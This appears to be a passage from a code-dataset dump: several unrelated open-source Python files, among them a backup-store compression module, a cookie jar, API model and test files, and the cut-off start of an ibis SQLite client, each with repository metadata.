repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
quanticio/backupstore | backupstore/src/core/common/metaoperation.py | 1 | 14620 | # coding=utf8
'''
@author : quanticio44
@contact : [email protected]
@license : See with Quanticio44
@summary : metaoperation for rsync complete
@since : 22/08/2014
'''
#Standard package
import os
import hashlib
import zipfile
import tarfile
#Internal package
import backupstoredbfile
import tools
class metaOperation(object):
''' checksum class definition '''
verbose = False
def __init__(self, checksum, compression, compressionLevel, compressionAlgo, BSDbFile=None, Verbose=False):
''' Constructor
@param checksum: checksum to sign the file ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')
@param compression: compression boolean to compress the archive
@param compressionLevel: level compression for zlib using
@param compressionAlgo: Algorithm to use [zlib, zip, tar, gzip, bz2]
@param Verbose: Verbosity mode '''
self.verbose = Verbose
self.obj_BSDbFile = None
self.lstFSObjToRemove = ([],[])
if not checksum or checksum.lower() not in hashlib.algorithms:
self.checksum = ''
else:
self.checksum = checksum.lower()
if self.checksum == 'md5':
self.hasher = hashlib.md5
elif self.checksum == 'sha1':
self.hasher = hashlib.sha1
elif self.checksum == 'sha224':
self.hasher = hashlib.sha224
elif self.checksum == 'sha256':
self.hasher = hashlib.sha256
elif self.checksum == 'sha384':
self.hasher = hashlib.sha384
elif self.checksum == 'sha512':
self.hasher = hashlib.sha512
if not compression:
self.compression = 0
else:
self.compression = compression
if not compressionLevel:
self.compressionLevel = 0
else:
self.compressionLevel = compressionLevel
if not compressionAlgo or compressionAlgo not in ('zip', 'tar', 'gzip', 'bz2'):
self.compressionAlgo = 'zip'
else:
self.compressionAlgo = compressionAlgo
if BSDbFile:
self.obj_BSDbFile = backupstoredbfile.BackupStoreDbFile(BSDbFile)
self.obj_BSDbFile.open()
def getChecksumOfFile(self, path, hexaCheckSum=True, BlockSize=65536):
''' Set checksum of file
@param path: path of file for the checksum '''
if self.checksum == '':
return
hasher = self.hasher()
with open(path, 'rb') as currentfile:
mybuffer = currentfile.read(BlockSize)
while len(mybuffer) > 0:
hasher.update(mybuffer)
mybuffer = currentfile.read(BlockSize)
if hexaCheckSum:
return hasher.hexdigest()
else:
return hasher.digest()
def updateFile(self, path):
''' UpdateMetaData of file in the database
@param path: path of file '''
try:
if not self.obj_BSDbFile:
return
self.obj_BSDbFile.updateFile(name = os.path.basename(path), path=os.path.dirname(path), stat=os.stat(path), checksum=self.getChecksumOfFile(path))
except:
print os.path.basename(path)
print os.path.dirname(path)
print os.stat(path)
print self.getChecksumOfFile(path)
raise
def removeFile(self, path):
''' Remove file in the database (the file does not exist)
@param path: path of file '''
if not self.obj_BSDbFile:
return
if not os.path.isfile(path):
self.obj_BSDbFile.removeFileOrFolder(name = os.path.basename(path), path=os.path.dirname(path))
def makeDir(self, pathfolder):
''' Make a folder in the database (the folder files must exist)
@param pathfolder: path of folder '''
if not self.obj_BSDbFile:
return
if os.path.isdir(pathfolder):
self.obj_BSDbFile.addFolder(path=pathfolder)
def preRemoveTree(self, path):
''' Pre-remove tree in the database
@param path: path of file '''
if not self.obj_BSDbFile:
return
self.lstFSObjToRemove = self.__getFSObjList(path, [path], [])
def postRemoveTree(self):
''' Post-remove tree in the database
@param path: path of file '''
if not self.obj_BSDbFile:
return
if len(self.lstFSObjToRemove[0]) == 0 and len(self.lstFSObjToRemove[1]) == 0:
return
# Remove files
for thisfile in self.lstFSObjToRemove[1]:
if not os.path.isfile(thisfile):
self.obj_BSDbFile.removeFileOrFolder(name = os.path.basename(thisfile), path = os.path.dirname(thisfile))
# Remove folders
for thisfolder in self.lstFSObjToRemove[0]:
if not os.path.isdir(thisfolder):
self.obj_BSDbFile.removeFileOrFolder(name = '', path = thisfolder)
def listdir(self, folder):
''' Get all filesystem object in a folder
@param folder: folder path '''
return self.obj_BSDbFile.getObjInFolderList(folder)
def getFSObject(self, path):
''' Get FileSystem object (file or directory)
@path: Path to search
@return: Return a BackupStoreFSObjProperty object '''
return self.obj_BSDbFile.getFSObj(path)
def shouldUpdate(self, cookie, sink, target):
''' Define if the file was changing
@param cookie: rsync cookie (params of all operation)
@param sink: original path
@param target: BackupStoreFSObjProperty object
@return if the file change '''
try:
sink_st = os.stat(sink)
sink_sz = sink_st.st_size
sink_mt = sink_st.st_mtime
except:
self.log("Fail to retrieve information about sink %s (skip update)" % sink, True)
return 1
try:
target_sz = target.getPropertyInStat(propertyLabel='st_size')
target_mt = target.getPropertyInStat(propertyLabel='st_mtime')
except:
self.log("Fail to retrieve information about sink %s (skip update)" % sink, True)
return 1
try:
if self.getChecksumOfFile(sink) != target.checksum:
return 1
except:
self.log("Fail to retrieve information about sink %s (skip update)" % sink, True)
return 1
if cookie.update:
return target_mt < sink_mt - cookie.modify_window
if cookie.ignore_time:
return 1
if target_sz != sink_sz:
return 1
if cookie.size_only:
return 0
return abs(target_mt - sink_mt) > cookie.modify_window
def isdir(self, folder):
''' Test if folder exist in the database
@param folder: folder path '''
return self.obj_BSDbFile.isFolder(folder)
def isfile(self, filepath):
''' Test if folder exist in the database
@param filepath: file path '''
return self.obj_BSDbFile.isFile(name = os.path.basename(filepath), path = os.path.dirname(filepath))
def log(self, message, error=False):
''' Log all operation
@param message: Message to log
@param error: Set an error (False by default) '''
if not self.obj_BSDbFile:
return
if error:
self.obj_BSDbFile.addTrace(message, self.obj_BSDbFile.ERROR)
else:
self.obj_BSDbFile.addTrace(message, self.obj_BSDbFile.INFO)
def __getFSObjList(self, path, lst_dir=[], lst_file=[]):
''' Getting the list of folder and file in a root folder
@param path: root folder
@param lst_dir: list of folder
@param lst_file: list of files '''
for obj in os.listdir(path):
abs_path = path + os.sep + obj
if os.path.isfile(abs_path):
lst_file.append(abs_path)
elif os.path.isdir(abs_path):
lst_dir.append(abs_path)
lst_dir1, lst_file1 = self.__getFSObjList(abs_path, lst_dir, lst_file)
lst_dir.extend(lst_dir1)
lst_file.extend(lst_file1)
return (lst_dir, lst_file)
def compressData(self, target_dir, filenames):
''' Compress data in the target_dir folder (all files) and clean files
@param target_dir: path to the folder
@param filenames: FileSystem object list '''
if not self.compression:
return
# Getting all files
allAbsFilesLst = []
for curfile in filenames:
if not os.path.isdir(target_dir + os.sep + curfile):
allAbsFilesLst.append(target_dir + os.sep + curfile)
if self.compressionAlgo.lower() == 'zip':
self.__compressDataToZipFile(self.__getArchiveName(target_dir, '.zip'), allAbsFilesLst)
elif self.compressionAlgo.lower() in ('tar', 'gzip', 'bz2'):
self.__compressDataToTarFile(self.__getArchiveName(target_dir, '.' + self.compressionAlgo.lower()), allAbsFilesLst)
def __getArchiveName(self, target_dir, extension):
''' Getting archive name with extension
@param target_dir: path to the folder
@param extension: Extension of archive
@return: Archive name '''
templatename = 'BS_files_' + extension
ArchiveName = target_dir + os.sep + templatename
nameexist = True
while nameexist:
if os.path.isfile(ArchiveName):
ArchiveName += '.' + templatename
else:
nameexist = False
return ArchiveName
def __compressDataToZipFile(self, zipfilename, allAbsFilesLst):
''' Compress data to a data file in the folder
@param zipfilename: Name of archive
@param allAbsFilesLst: All files to add '''
# Get compression type
if self.compressionLevel <= 1:
compress = zipfile.ZIP_STORED
else:
compress = zipfile.ZIP_DEFLATED
# Size verify : if the files in the folder (not in the subfolder) is more 2Go we use allowZip64
if tools.folderInformation(os.path.dirname(zipfilename)).getLocalSize() >= 2147483648:
allowZip64 = True
else:
allowZip64 = False
# Create zipfile
with zipfile.ZipFile(zipfilename, 'w', compress, allowZip64=allowZip64) as currentzip:
for curfile in allAbsFilesLst:
currentzip.write(curfile, os.path.basename(curfile))
# Verify and clean
error = ''
if zipfile.is_zipfile(zipfilename):
obj_zip = zipfile.ZipFile(zipfilename, 'r')
if len(obj_zip.namelist()) != len(allAbsFilesLst):
error = 'Archive is not correct (number files is not correct) !'
if obj_zip.testzip() != None:
error = 'Archive is not correct !'
obj_zip.close()
else:
error = 'Archive is not a zipfile !'
# Clean files in the folder
if error == '':
for curfile in allAbsFilesLst:
os.remove(curfile)
else:
if self.verbose:
print error
self.log(error, error=True)
def __compressDataToTarFile(self, tarfilename, allAbsFilesLst, algo='tar'):
''' Compress data to a data file in the folder
@param zipfilename: Name of archive
@param allAbsFilesLst: All files to add '''
# Get compression type
mode = 'w'
if algo == 'gzip':
mode += ':gz'
elif algo == 'bz2':
mode += ':bz2'
# Create zipfile
with tarfile.open(tarfilename, mode) as currenttar:
for curfile in allAbsFilesLst:
currenttar.add(curfile, arcname=os.path.basename(curfile), recursive=False)
# Verify and clean
error = ''
currenttar = tarfile.open(tarfilename, 'r')
if len(currenttar.getmembers()) != len(allAbsFilesLst):
error = 'Archive is not correct (number files is not correct) !'
currenttar.close()
# Clean files in the folder
if error == '':
for curfile in allAbsFilesLst:
os.remove(curfile)
else:
if self.verbose:
print error
self.log(error, error=True)
def unCompressData(self, target_dir):
''' Uncompress data in the target_dir folder (all files) and clean archive
@param target_dir: path to the folder '''
if not self.compression:
return
algo = self.compressionAlgo.lower()
ArchiveName = ''
templatename = 'BS_files_' + '.' + self.compressionAlgo
if algo in ('zip', 'tar', 'gzip', 'bz2'):
for name in os.listdir(target_dir):
if os.path.isfile(target_dir + os.sep + name) and name[len(name) - len(templatename):] == templatename:
ArchiveName = target_dir + os.sep + name
break
if ArchiveName == '':
return
raise EnvironmentError('Not found the archive for uncompress operation in %s' % target_dir)
if algo == 'zip':
with zipfile.ZipFile(ArchiveName, 'r') as currentzip:
currentzip.extractall(target_dir)
elif algo in ('tar', 'gzip', 'bz2'):
mode = 'r'
if algo == 'gzip':
mode += ':gz'
elif algo == 'bz2':
mode += ':bz2'
with tarfile.open(ArchiveName, mode) as currenttar:
currenttar.extractall(target_dir)
os.remove(ArchiveName) | gpl-2.0 | -7,056,456,634,023,718,000 | 34.831234 | 158 | 0.5487 | false |
zathras777/atavism | atavism/http11/cookies.py | 1 | 3542 | from datetime import datetime
def stripped_split(ss, c, n=-1):
return [p.strip() for p in ss.split(c, n)]
class Cookie(object):
def __init__(self, path=None, key=None, value=None, domain=None, expires=None, max_age=None, secure=False):
self.path = path
self.key = key
self.value = value
self.expires = expires
self.domain = domain
self.max_age = max_age
self.secure = secure
self.http_only = False
def __eq__(self, other):
if other.path != self.path or other.key != self.key or other.domain != self.domain:
return False
return True
def __str__(self):
base = ['{}={}'.format(self.key or '', self.value or '')]
if self.path is not None:
base.append("Path={}".format(self.path))
if self.domain is not None:
base.append("Domain={}".format(self.domain))
if self.http_only:
base.append('HttpOnly')
return "; ".join(base)
def set_expires(self, dtstr):
self.expires = datetime.strptime(dtstr, "%a, %d-%b-%Y %H:%M:%S %Z")
def as_header(self):
return "{}={}".format(self.key, self.value)
def is_relevant(self, _path=None):
if self.expires is not None:
if self.expires < datetime.utcnow():
return False
if _path is None:
return False
if self.path is None or _path == '/':
return True
if _path[:len(self.path)].lower() == self.path.lower():
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if len(self.path) == len(other.path):
return self.key < other.key
return len(self.path) < len(other.path)
def __gt__(self, other):
return len(self.path) > len(other.path)
class CookieJar(object):
def __init__(self):
self.cookies = []
def __len__(self):
return len(self.cookies)
def add_cookie(self, _cookie):
for cc in self.cookies:
if cc == _cookie:
cc.value = _cookie.value
return
self.cookies.append(_cookie)
def __getitem__(self, item):
for c in self.cookies:
if c.key == item:
return c.value
return None
def get_cookie(self, item):
for c in self.cookies:
if c.key == item:
return c
return None
def parse_set_cookie(self, hdr_string):
if '=' not in hdr_string:
return
parts = stripped_split(hdr_string, ';')
c = Cookie()
c.key, c.value = stripped_split(parts[0], '=', 1)
for p in parts[1:]:
if p == 'HttpOnly':
c.http_only = True
continue
k, v = stripped_split(p, '=', 1)
if k.lower() == 'expires':
c.set_expires(v)
else:
setattr(c, k.lower(), v)
self.add_cookie(c)
def check_cookies(self, http_obj):
cookies = http_obj.get('set-cookie')
if cookies is None:
return
for c_str in cookies:
self.parse_set_cookie(c_str)
def get_cookies(self, _path):
matched = []
for c in self.cookies:
if c.is_relevant(_path):
matched.append(c)
if len(matched) == 0:
return None
return '; '.join([c.as_header() for c in sorted(matched)])
| unlicense | -4,666,415,880,981,012,000 | 27.111111 | 111 | 0.513552 | false |
rafaelosoto/stream | {{cookiecutter.script_name}}/setup.py | 1 | 2382 | # -*- coding: utf-8 -*-
import re
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
REQUIRES = [
'docopt',
]
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
def find_version(fname):
'''Attempts to find the version number in the file names fname.
Raises RuntimeError if not found.
'''
version = ''
with open(fname, 'r') as fp:
reg = re.compile(r'__version__ = [\'"]([^\'"]*)[\'"]')
for line in fp:
m = reg.match(line)
if m:
version = m.group(1)
break
if not version:
raise RuntimeError('Cannot find version information')
return version
__version__ = find_version("{{ cookiecutter.script_name }}.py")
def read(fname):
with open(fname) as fp:
content = fp.read()
return content
setup(
name='{{ cookiecutter.script_name }}',
version="{{ cookiecutter.version }}",
description='{{ cookiecutter.short_description }}',
long_description=read("README.rst"),
author='{{ cookiecutter.full_name }}',
author_email='{{ cookiecutter.email }}',
url='https://github.com/{{ cookiecutter.github_username }}/{{ cookiecutter.script_name }}',
install_requires=REQUIRES,
license=read("LICENSE"),
zip_safe=False,
keywords='{{ cookiecutter.script_name }}',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
py_modules=["{{ cookiecutter.script_name }}"],
entry_points={
'console_scripts': [
"{{cookiecutter.script_name}} = {{cookiecutter.script_name}}:main"
]
},
tests_require=['pytest'],
cmdclass={'test': PyTest}
)
| mit | -7,396,378,709,102,490,000 | 28.775 | 95 | 0.594039 | false |
onshape-public/onshape-clients | python/onshape_client/oas/models/btm_configuration_parameter819.py | 1 | 8298 | # coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_tree_node20
except ImportError:
bt_tree_node20 = sys.modules["onshape_client.oas.models.bt_tree_node20"]
try:
from onshape_client.oas.models import btm_configuration_parameter_boolean2550
except ImportError:
btm_configuration_parameter_boolean2550 = sys.modules[
"onshape_client.oas.models.btm_configuration_parameter_boolean2550"
]
try:
from onshape_client.oas.models import btm_configuration_parameter_enum105
except ImportError:
btm_configuration_parameter_enum105 = sys.modules[
"onshape_client.oas.models.btm_configuration_parameter_enum105"
]
try:
from onshape_client.oas.models import btm_configuration_parameter_quantity1826
except ImportError:
btm_configuration_parameter_quantity1826 = sys.modules[
"onshape_client.oas.models.btm_configuration_parameter_quantity1826"
]
try:
from onshape_client.oas.models import btm_configuration_parameter_string872
except ImportError:
btm_configuration_parameter_string872 = sys.modules[
"onshape_client.oas.models.btm_configuration_parameter_string872"
]
class BTMConfigurationParameter819(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
("parameter_type",): {
"ENUM": "ENUM",
"BOOLEAN": "BOOLEAN",
"STRING": "STRING",
"QUANTITY": "QUANTITY",
},
}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"generated_parameter_id": (bt_tree_node20.BTTreeNode20,), # noqa: E501
"import_microversion": (str,), # noqa: E501
"node_id": (str,), # noqa: E501
"parameter_id": (str,), # noqa: E501
"parameter_name": (str,), # noqa: E501
"parameter_type": (str,), # noqa: E501
"valid": (bool,), # noqa: E501
}
@staticmethod
def discriminator():
return {
"bt_type": {
"BTMConfigurationParameterString-872": btm_configuration_parameter_string872.BTMConfigurationParameterString872,
"BTMConfigurationParameterEnum-105": btm_configuration_parameter_enum105.BTMConfigurationParameterEnum105,
"BTMConfigurationParameterQuantity-1826": btm_configuration_parameter_quantity1826.BTMConfigurationParameterQuantity1826,
"BTMConfigurationParameterBoolean-2550": btm_configuration_parameter_boolean2550.BTMConfigurationParameterBoolean2550,
},
}
attribute_map = {
"bt_type": "btType", # noqa: E501
"generated_parameter_id": "generatedParameterId", # noqa: E501
"import_microversion": "importMicroversion", # noqa: E501
"node_id": "nodeId", # noqa: E501
"parameter_id": "parameterId", # noqa: E501
"parameter_name": "parameterName", # noqa: E501
"parameter_type": "parameterType", # noqa: E501
"valid": "valid", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btm_configuration_parameter819.BTMConfigurationParameter819 - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
generated_parameter_id (bt_tree_node20.BTTreeNode20): [optional] # noqa: E501
import_microversion (str): [optional] # noqa: E501
node_id (str): [optional] # noqa: E501
parameter_id (str): [optional] # noqa: E501
parameter_name (str): [optional] # noqa: E501
parameter_type (str): [optional] # noqa: E501
valid (bool): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
@classmethod
def get_discriminator_class(cls, from_server, data):
"""Returns the child class specified by the discriminator"""
discriminator = cls.discriminator()
discr_propertyname_py = list(discriminator.keys())[0]
discr_propertyname_js = cls.attribute_map[discr_propertyname_py]
if from_server:
class_name = data[discr_propertyname_js]
else:
class_name = data[discr_propertyname_py]
class_name_to_discr_class = discriminator[discr_propertyname_py]
return class_name_to_discr_class.get(class_name)
| mit | 8,308,044,639,556,013,000 | 36.718182 | 137 | 0.61075 | false |
Siecje/asphalt | tests/test_application.py | 1 | 6546 | from asyncio import coroutine, new_event_loop, set_event_loop, get_event_loop
from unittest.mock import Mock
import sys
from pkg_resources import EntryPoint
import pytest
from asphalt.core.application import Application
from asphalt.core.component import Component
from asphalt.core.context import ApplicationContext, ContextEventType
from asphalt.core.util import asynchronous
class ShutdownAPI:
def __init__(self, app_ctx: ApplicationContext, method: str):
self.app_ctx = app_ctx
self.method = method
@asynchronous
def shutdown(self):
def callback():
if self.method == 'stop':
get_event_loop().stop()
elif self.method == 'exit':
sys.exit()
else:
raise BaseException('this should crash the application')
def schedule(ctx):
event_loop.call_later(0.1, callback)
event_loop = get_event_loop()
self.app_ctx.add_callback(ContextEventType.started, schedule)
class ShutdownComponent(Component):
def __init__(self, method: str):
self.method = method
def start(self, app_ctx: ApplicationContext):
app_ctx.resources.add(ShutdownAPI(app_ctx, self.method), context_var='shutter')
class CustomApp(Application):
def __init__(self, components=None, **kwargs):
super().__init__(components, **kwargs)
self.start_callback_called = False
self.finish_callback_called = False
@coroutine
def start(self, app_ctx: ApplicationContext):
def started_callback(ctx):
self.start_callback_called = True
def finished_callback(ctx):
self.finish_callback_called = True
app_ctx.add_callback(ContextEventType.started, started_callback)
app_ctx.add_callback(ContextEventType.finished, finished_callback)
app_ctx.shutter.shutdown()
class TestApplication:
@pytest.fixture
def event_loop(self):
event_loop = new_event_loop()
set_event_loop(event_loop)
return event_loop
@pytest.fixture
def app(self):
app = CustomApp()
app.component_types['shutdown'] = ShutdownComponent
return app
@pytest.mark.parametrize('use_entrypoint', [True, False], ids=['entrypoint', 'explicit_class'])
def test_add_component(self, use_entrypoint):
"""
Tests that add_component works with an without an entry point and that external
configuration overriddes local (hardcoded) configuration values.
"""
app = CustomApp({'shutdown': {'method': 'stop'}})
if not use_entrypoint:
app.add_component('shutdown', ShutdownComponent, method='exception')
else:
entrypoint = EntryPoint('shutdown', __spec__.name)
entrypoint.load = Mock(return_value=ShutdownComponent)
app.component_types['shutdown'] = entrypoint
app.add_component('shutdown', method='exception')
assert len(app.components) == 1
assert isinstance(app.components[0], ShutdownComponent)
assert app.components[0].method == 'stop'
@pytest.mark.parametrize('alias, cls, exc_cls, message', [
('', None, TypeError, 'component_alias must be a nonempty string'),
(6, None, TypeError, 'component_alias must be a nonempty string'),
('foo', None, LookupError, 'no such component type: foo'),
('foo', int, TypeError, 'the component class must be a subclass of asphalt.core.Component')
])
def test_add_component_errors(self, app, alias, cls, exc_cls, message):
exc = pytest.raises(exc_cls, app.add_component, alias, cls)
assert str(exc.value) == message
@pytest.mark.parametrize('shutdown_method', ['stop', 'exit'])
@pytest.mark.parametrize('logging_config', [
True,
{'version': 1, 'loggers': {'asphalt': {'level': 'INFO'}}}
], ids=['basic', 'dictconfig'])
def test_run(self, event_loop, app, caplog, shutdown_method, logging_config):
"""
Tests that both started and finished callbacks are run when the application is started and
shut down properly.
"""
app.add_component('shutdown', method=shutdown_method)
app.logging_config = logging_config
app.run(event_loop)
assert app.start_callback_called
assert app.finish_callback_called
records = [record for record in caplog.records() if record.name == 'asphalt.core']
assert len(records) == 4
assert records[0].message == 'Starting components'
assert records[1].message == 'All components started'
assert records[2].message == 'Application started'
assert records[3].message == 'Application stopped'
def test_start_exception(self, event_loop, app, caplog):
"""
Tests that an exception caught during the application initialization is put into the
application context and made available to finish callbacks.
"""
def finish(app_ctx):
nonlocal exception
exception = app_ctx.exception
def start(app_ctx: ApplicationContext):
app_ctx.add_callback(ContextEventType.finished, finish)
raise Exception('bad component')
exception = None
app.start = start
app.add_component('shutdown', method='stop')
app.run(event_loop)
assert str(exception) == 'bad component'
records = [record for record in caplog.records() if record.name == 'asphalt.core']
assert len(records) == 4
assert records[0].message == 'Starting components'
assert records[1].message == 'All components started'
assert records[2].message == 'Error during application startup'
assert records[3].message == 'Application stopped'
def test_run_baseexception(self, event_loop, app, caplog):
"""
Tests that BaseExceptions aren't caught anywhere in the stack and crash the application.
"""
app.add_component('shutdown', method='exception')
exc = pytest.raises(BaseException, app.run, event_loop)
assert str(exc.value) == 'this should crash the application'
assert app.start_callback_called
records = [record for record in caplog.records() if record.name == 'asphalt.core']
assert len(records) == 3
assert records[0].message == 'Starting components'
assert records[1].message == 'All components started'
assert records[2].message == 'Application started'
| apache-2.0 | -4,469,244,306,901,962,000 | 37.280702 | 99 | 0.643294 | false |
m-ober/byceps | tests/api/tourney/match/comments/test_get_comments_for_match.py | 1 | 3509 | """
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
import pytest
from byceps.services.tourney import (
match_comment_service as comment_service,
match_service,
)
def test_get_comments_for_match(
api_client, api_client_authz_header, match, comment
):
url = f'/api/tourney/matches/{match.id}/comments'
headers = [api_client_authz_header]
response = api_client.get(url, headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert response.get_json() == {
'comments': [
{
'comment_id': str(comment.id),
'match_id': str(comment.match_id),
'created_at': comment.created_at.isoformat(),
'creator': {
'user_id': str(comment.created_by.id),
'screen_name': comment.created_by.screen_name,
'suspended': False,
'deleted': False,
'avatar_url': None,
'is_orga': False,
},
'body_text': 'Denn man tau.',
'body_html': 'Denn man tau.',
'last_edited_at': None,
'last_editor': None,
'hidden': False,
'hidden_at': None,
'hidden_by_id': None,
}
]
}
def test_get_comments_for_match_with_edited_comment(
api_client, api_client_authz_header, match, edited_comment
):
url = f'/api/tourney/matches/{match.id}/comments'
headers = [api_client_authz_header]
response = api_client.get(url, headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert response.get_json() == {
'comments': [
{
'comment_id': str(edited_comment.id),
'match_id': str(edited_comment.match_id),
'created_at': edited_comment.created_at.isoformat(),
'creator': {
'user_id': str(edited_comment.created_by.id),
'screen_name': edited_comment.created_by.screen_name,
'suspended': False,
'deleted': False,
'avatar_url': None,
'is_orga': False,
},
'body_text': '[b]So nicht[/b], Freundchen!',
'body_html': '<strong>So nicht</strong>, Freundchen!',
'last_edited_at': edited_comment.last_edited_at.isoformat(),
'last_editor': {
'user_id': str(edited_comment.last_edited_by.id),
'screen_name': edited_comment.last_edited_by.screen_name,
'suspended': False,
'deleted': False,
'avatar_url': None,
'is_orga': False,
},
'hidden': False,
'hidden_at': None,
'hidden_by_id': None,
}
]
}
# helpers
@pytest.fixture
def match(app):
return match_service.create_match()
@pytest.fixture
def comment(app, match, user):
return comment_service.create_comment(match.id, user.id, 'Denn man tau.')
@pytest.fixture
def edited_comment(app, comment, admin):
comment_service.update_comment(
comment.id, admin.id, '[b]So nicht[/b], Freundchen!'
)
return comment_service.get_comment(comment.id)
| bsd-3-clause | -1,295,547,686,589,896,400 | 31.192661 | 77 | 0.520946 | false |
yaolei313/python-study | algorithm_study/region_merge.py | 1 | 3025 | # Definition for an interval.
class Interval:
def __init__(self, s=0, e=0):
self.start = s
self.end = e
def __str__(self):
return "[{},{}]".format(self.start, self.end)
class Solution:
def merge(self, intervals):
"""
:type intervals: List[Interval]
:rtype: List[Interval]
"""
if intervals is None:
return []
elif len(intervals) == 1:
return intervals
# self.quickSort(intervals, 0, len(intervals) - 1, lambda x: x.start)
intervals.sort(key=lambda x: x.start)
for interval in intervals:
print('%s' % interval, end='')
print()
rst = []
region_left = None
region_right = None
for t1 in intervals:
if region_left is None:
region_left = t1.start
region_right = t1.end
continue
if region_right >= t1.start:
region_right = max(region_right, t1.end)
else:
rst.append(Interval(region_left, region_right))
region_left = t1.start
region_right = t1.end
if region_left is not None:
rst.append(Interval(region_left, region_right))
return rst
def quickSort(self, lst, l, r, func):
if l >= r:
return
key_idx = l
key = lst[l]
compare_key = func(lst[l])
i, j = l, r
while i < j:
while func(lst[j]) >= compare_key and i < j:
j -= 1
if i < j:
lst[key_idx] = lst[j]
while func(lst[i]) <= compare_key and i < j:
i += 1
if i < j:
lst[j] = lst[i]
key_idx = i
lst[key_idx] = key
self.quickSort(lst, l, key_idx - 1, func)
self.quickSort(lst, key_idx + 1, r, func)
def quickSort2(self, lst, l, r):
"""
:type lst: List[int]
:rtype List[int]
"""
if l < r:
key = lst[l]
i = l
j = r
while i < j:
while lst[j] >= key and i < j:
j -= 1
if i < j:
lst[i] = lst[j]
while lst[i] <= key and i < j:
i += 1
if i < j:
lst[j] = lst[i]
lst[i] = key
self.quickSort2(lst, l, i - 1)
self.quickSort2(lst, i + 1, r)
if __name__ == "__main__":
t = Solution()
input_grid = [Interval(1, 3), Interval(8, 10), Interval(2, 6), Interval(15, 18)]
t_result = t.merge(input_grid)
for item in t_result:
print('%s' % item, end='')
# input_array = [2, 5, 33, 2, 17, 5, 2]
# t.quickSort(input_array, 0, len(input_array) - 1, lambda x: x)
# print(input_array)
# input_array2 = [2, 5, 33, 2, 17, 5, 2]
# t.quickSort2(input_array2, 0, len(input_array2) - 1)
# print(input_array2)
| gpl-2.0 | 81,288,053,263,669,400 | 26.5 | 84 | 0.447603 | false |
cloudera/ibis | ibis/backends/sqlite/client.py | 1 | 9430 | import errno
import functools
import inspect
import math
import os
from typing import Optional
import regex as re
import sqlalchemy as sa
import ibis.backends.base_sqlalchemy.alchemy as alch
from ibis.client import Database
from .compiler import SQLiteDialect
class SQLiteTable(alch.AlchemyTable):
pass
class SQLiteDatabase(Database):
pass
_SQLITE_UDF_REGISTRY = set()
_SQLITE_UDAF_REGISTRY = set()
def udf(f):
"""Create a SQLite scalar UDF from `f`
Parameters
----------
f
A callable object
Returns
-------
callable
A callable object that returns ``None`` if any of its inputs are
``None``.
"""
@functools.wraps(f)
def wrapper(*args):
if any(arg is None for arg in args):
return None
return f(*args)
_SQLITE_UDF_REGISTRY.add(wrapper)
return wrapper
def udaf(cls):
"""Register a UDAF class with any SQLite connection."""
_SQLITE_UDAF_REGISTRY.add(cls)
